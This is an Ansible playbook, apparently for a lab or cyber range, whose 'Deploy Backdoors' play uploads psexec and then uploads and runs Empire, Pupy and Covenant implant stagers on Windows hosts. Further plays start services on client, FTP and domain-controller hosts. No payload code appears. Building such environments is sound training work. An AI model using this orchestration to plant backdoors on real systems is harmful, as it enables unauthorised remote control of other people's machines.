-
  name: Deploy Backdoors
  hosts: windows
  strategy: free
  vars:
    empire: empire.bat
    pupy: pupy_windows.exe
    covenant: GruntStager.ps1
  gather_facts: no
  tasks:
    - include: tasks/create_temp.yaml
    - include: tasks/upload_psexec.yaml
    - include: tasks/upload_all_malware.yaml
    - include: tasks/run_malware.yaml
-
  name: Startup
  hosts: windowsclients
  strategy: free
  gather_facts: no
  tasks:
    - include: tasks/startup_clients.yaml

-
  name: Startup
  hosts: windowsftp, windowsad
  strategy: free
  gather_facts: no
  tasks:
    - include: tasks/startup_servers.yaml
